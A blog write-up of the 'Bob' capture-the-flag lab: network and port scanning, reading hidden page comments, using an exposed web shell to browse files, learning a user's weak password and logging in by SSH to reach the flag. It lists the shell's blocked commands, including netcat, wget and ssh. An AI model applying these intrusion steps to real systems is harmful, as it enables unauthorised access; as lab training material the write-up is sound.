Bob CTF

RECONNAISSANCE

I opened netdiscover to do a network scan and my target IP was 192.168.0.151

After that I had to to a port scan using Nmap and discovered that port 80 was open

NOTE: Another alternative is Nmap -sV -A -p- 192.168.0.151

I copy-pasted the IP on the URL and this was the website so the next thing I had to navigate on the navigation bar (home, news, about us, contacts us and logins) to see what I could find

This was he news page where I found out why the website was under reconstructs, basically there servers were hacked so they had to take security measures

Under contact us I found the email address and phone numbers of internal employees which is one of the worst practices, but it’s an advantage to us where I could use the email for login purpose, and the best part is that we now know the administrators user name which is admin and also we know who the admin is which is bob.

The next thing was to start inspecting element of the web page and see what we could find. In /login.html I found a piece of comment that bob left for the other it guys.

After that I checked new.html and found a base 64 encoded string which I had to decode

After decoding the message, I found out that bob left a message where he was complaining that someone had created a file called password.html.

The next thing I had to check what the page password.html contained, but before doing that I had to open burp suite to intercept and examine the traffics. After opening burp suit I found the normal navigation bar

Next I had to spider the page and I managed to get interesting hidden folders one of them being a shell and another one being a password folder,

After opening the password.html page I found another message that bob left the team on why they were hacked in the first place.

“Really who made this file at least get a hash of your password to display, hackers can’t do anything with a hash, this is probably why we had a security breach in the first place. Come on people this is basic 101 security! I have moved the file off the server. Don’t make me have to clean up the mess every time someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
-Bob

The worst advice that bob gave the team was to leave the password hash because he believes that hackers can’t do anything with the hashes

The next thing was I had to check the other hidden folder which was lat_memo.html and bob left another message for the IT guys about the shell.

“Memo sent at GMT+10:00 2:37:42 by User: Bob
Hey guys IT here don’t forget to check your emails regarding the recent security breach. There is a web shell running on the server with no protection, but it should be safe as I have ported over the filter from the old windows server to our new linux one. Your email will have the link to the shell.

-Bob

Next, I had run the shell subfolder and it opened a command execution page

The next step was I had to examine the source code of dev_shell.php page and see what I could find, and I found another note where bob told the other employees 

Next I went back to dev.shell.php page and I had typed in the command dir on the command box and a list of directories popped up. Next I had to examine the directory dev_shell.php.bak where it downloaded a shell from the website.

After downloading the script, I opened it and saw the command that can’t be executed which include  pwd, netcat, ssh, wget, ping, traceroute, cat and nc

After getting to know the commands which cant be used I went back to the shell and typed in More /home to see if there was a home directory and indeed there was one

 After changing the directory to home using the command Dir /home I saw a list of user names

After that, I had to get into the directory Elliot and see what I could find by typing the command Dir /home/Elliot where I found a file called theadminisdumb.txt

Then I typed in the command More /home/Elliot/theadminisdumb.txt to read the txt file which stated tha

“:::::::::::::: /home/elliot/theadminisdumb.txt :::::::::::::: The admin is dumb, In fact everyone in the IT dept is pretty bad but I can’t blame all of them the newbies Sebastian and James are quite new to managing a server so I can forgive them for that password file they made on the server. But the admin now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James now they do some dumb stuff but their new and this is just a high-school server who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that don’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much but he just yells at me and says I don’t know what I’m doing. Sebastian has noticed and I gave him some tips on better securing his account, I can’t say the same for his friend James who doesn’t care and made his password: Qwerty. To be honest, James isn’t the worst bob is his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. it’s only a matter of time before it’s broken into so because of this I have changed my password to the admin is dumb I hope bob is fired after the future second breach because of his incompetence. I almost want to fix it myself but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired it’s a good time.”

Elliote mentioned the password of james which became a plus for me.

After knowing that james uses a username of jc and password of Qwerty, I connected to the server using the ssh port 25468 and logged in as james

Then I had to list all the directories and I found the final flag which read “hey n there flag.txt”

Download Bob CTF

One thought on “Bob CTF

  1. My brother suggested I would possibly like this website. He was entirely right. This post actually made my day. You cann’t believe just how much time I had spent for this information! Thanks!

Leave a Reply

Your email address will not be published. Required fields are marked *